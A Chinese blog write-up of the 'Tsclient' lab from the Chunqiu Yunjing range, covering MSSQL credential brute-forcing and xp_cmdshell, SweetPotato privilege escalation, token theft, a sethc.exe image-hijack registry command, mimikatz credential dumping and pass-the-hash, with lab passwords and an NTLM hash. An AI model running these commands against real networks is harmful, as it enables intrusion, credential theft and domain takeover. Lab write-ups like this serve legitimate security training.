【内网渗透】春秋云镜 Tsclient WP

前言

mssql连接和攻击、windows提权、令牌窃取、镜像劫持

flag1

上来就扫给的地址
nmap:
在这里插入图片描述
结合题目的mssql知识点,估计是从这里入手了,尝试爆破用户名和密码,这里先用fscan来爆,可以直接爆出来(别的工具也可)
在这里插入图片描述
得到

sa 1qaz!QAZ

用这个工具去进行后面的攻击

https://github.com/SafeGroceryStore/MDUT/releases/tag/v2.1.1

在这里插入图片描述
激活组件下的Xpcmdshell即可命令执行
尝试访问Users/Administrator下的文件无回显,新建文件报错,目前我们没有权限读取,那么先配代理,不配代理远程桌面都连不上。chisel:
在这里插入图片描述
跳板机这边是windows,所以要下windows的chisel.exe,跳板机上执行的命令就多个.exe,其他一样。
配好以后打开本机proxifier配置代理服务,不再赘述。
上传甜土豆,地址如下

https://github.com/uknowsec/SweetPotato

(刚打的时候我也疑惑,为什么就知道要上传甜土豆,然后大哥们说都是经验…
不过甜土豆确实可以针对大部分的windows去提权)
直接利用
在这里插入图片描述
-a 后面加命令 这里我添加一个用户为sapphire,命令自查,然后给最高权限
在这里插入图片描述
登陆找到flag1
在这里插入图片描述
在这里插入图片描述

flag2

给了提示Maybe you should focus on user sessions
注意会话状态
quser命令 # 查看当前服务器用户连接状态
在这里插入图片描述
发现有个john在连接这台机子,所以这台主机是存在John的令牌的,尝试进行令牌窃取,这里我参考别人的文章用的ShrakToken,会报错,安装这个就行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安装结束以后就可以用了,用上面提到的数据库连接软件上传SharkToken.exe进来,然后使用管理员权限打开cmd,用sharktoken进行令牌窃取
在这里插入图片描述
窃取以后 net use查看有个网络共享的文件夹在这里插入图片描述
在这里插入图片描述
读取文件
在这里插入图片描述
得到一个用户名和密码,并且提示镜像劫持。

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#登陆

做好信息收集,fscan扫C段

NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:2096:324f:d89b:c8fb
[*] 172.22.8.31          XIAORANG\WIN19-CLIENT      
NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] 172.22.8.15    [+]DC XIAORANG\DC01              
[*] WebTitle:http://172.22.8.18        code:200 len:703    title:IIS Windows Server.
[*] 172.22.8.46          XIAORANG\WIN2016           Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.8.46        code:200 len:703    title:IIS Windows Server

本机是172.22.8.18
先看看本机情况
在这里插入图片描述
因为主DNS后缀为空,所以这个机子不在域内
那么还有三个机子

172.22.8.31 WIN19-CLIENT
172.22.8.15 [+]DC XIAORANG\DC01 域控
172.22.8.46 XIAORANG\WIN2016           Windows Server 2016 Datacenter

用crackmapexec进行一个枚举登陆,其实也不用,就这几台机子试一下就行了

proxychains  crackmapexec  smb 172.22.8.0/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' --loggedon-users

用rdesktop登陆,用户名Aldrich,密码Ald@rLMWuy7Z!#

proxychains rdesktop 172.22.8.46(试了以后只有这个可以)

登陆以后提示要改密码,那就改,改完以后用windows自带的远程桌面登陆,不然kali的太卡了
在这里插入图片描述
提示了镜像劫持,网上搜文章试试

Get-Acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

在这里插入图片描述
普通用户也可以创建,这里参考别人的

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

然后锁定屏幕,按5次shift即可,我这添加了个新管理员,其实直接将刚才登陆的用户设置成管理员就可以了,因为新添加的用户不在域内.
在这里插入图片描述
得到flag2

flag3

在这里插入图片描述
查看域管用户
在这里插入图片描述
接着上传mimikatz到172.22.8.46里,抓取hash,怎么上传文件百度就有
管理员权限运行cmd,提权,抓密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

在这里插入图片描述
刚好这里有域管的NTLM
使用mimikatz进行hash传递攻击

.\mimikatz.exe
sekurlsa:pth /user:目标机器用户名 /domain:目标机器IP /ntlm:本地获取的NTLM hash值
例如:sekurlsa::pth /user:administrator /domain:192.168.3.133 /ntlm:afff........

那么就是

sekurlsa::pth /user:WIN2016$ /domain:g1ts /ntlm:e64a6ccc013938f2c6daaa63480727c5

然后就会弹出一个cmd.exe可以直接访问到域控的文件,拿到flag3
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值